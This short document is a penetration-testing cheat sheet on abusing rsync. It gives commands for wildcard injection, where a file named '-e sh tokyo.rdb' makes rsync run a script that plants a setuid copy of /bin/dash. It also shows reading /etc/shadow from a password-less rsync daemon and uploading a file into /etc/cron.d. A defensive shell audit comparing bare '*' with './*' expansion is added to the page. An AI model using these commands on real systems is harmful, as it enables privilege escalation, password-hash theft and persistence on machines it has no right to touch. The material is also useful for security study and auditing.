Abusing Wildcards

rsync

Arbitrary Code Execution

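Create the payload script (as written it is not a reverse shell: it copies /bin/dash to /var/tmp/tokyo and sets the setuid bit):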
echo -e '#!/bin/sh\ncp /bin/dash /var/tmp/tokyo\nchmod 4755 /var/tmp/tokyo' > tokyo.rdb
Then create a file whose name rsync parses as its -e option when a wildcard expands in this directory, so that the script runs:

touch -- '-e sh tokyo.rdb'
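
Added example, not from the original page: a POSIX shell audit for the condition this technique depends on, showing that the file name above reaches the command line as an option under a bare `*` but not under `./*`. The function names and the demo directory are constructed for illustration.

```shell
#!/bin/sh
# Added example: audit a directory for option-shaped file names and compare
# what a bare `*` and an anchored `./*` hand to a command such as rsync.

# Print each entry in directory $1 whose name begins with '-'.
# A bare `*` expanded there passes these names to rsync as options.
find_option_like_names() {
    for path in "$1"/-*; do
        # An unmatched glob stays literal; skip it.
        [ -e "$path" ] || [ -L "$path" ] || continue
        printf '%s\n' "${path##*/}"
    done
}

# Count how many words of an argument list start with '-'.
count_option_args() {
    n=0
    for arg in "$@"; do
        case $arg in -*) n=$((n + 1)) ;; esac
    done
    printf '%s\n' "$n"
}

# Expand a glob inside directory $1 the way a job run there would and report
# how many resulting arguments look like options.
# $2 is "bare" for `*` or "anchored" for `./*`.
option_args_after_glob() (
    cd "$1" || exit 1
    if [ "$2" = anchored ]; then set -- ./*; else set -- *; fi
    count_option_args "$@"
)

# Constructed demo directory: one ordinary file and one option-shaped name.
demo_dir=$(mktemp -d)
: > "$demo_dir/notes.txt"
: > "$demo_dir/-e sh tokyo.rdb"

echo "option-like names:"; find_option_like_names "$demo_dir"
echo "bare *  -> $(option_args_after_glob "$demo_dir" bare) option-like argument(s)"
echo "./*     -> $(option_args_after_glob "$demo_dir" anchored) option-like argument(s)"
rm -rf "$demo_dir"
```

A job that only needs to copy a directory's contents can avoid the glob entirely with `rsync -a src/ dest/`.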

Sometimes the rsync daemon is configured so that a password is not required:

Arbitrary File Read

rsync -a rsync://backup:873/etc/shadow

Arbitrary File Upload

rsync -avp clean rsync://backup:873/src/etc/cron.d/clean
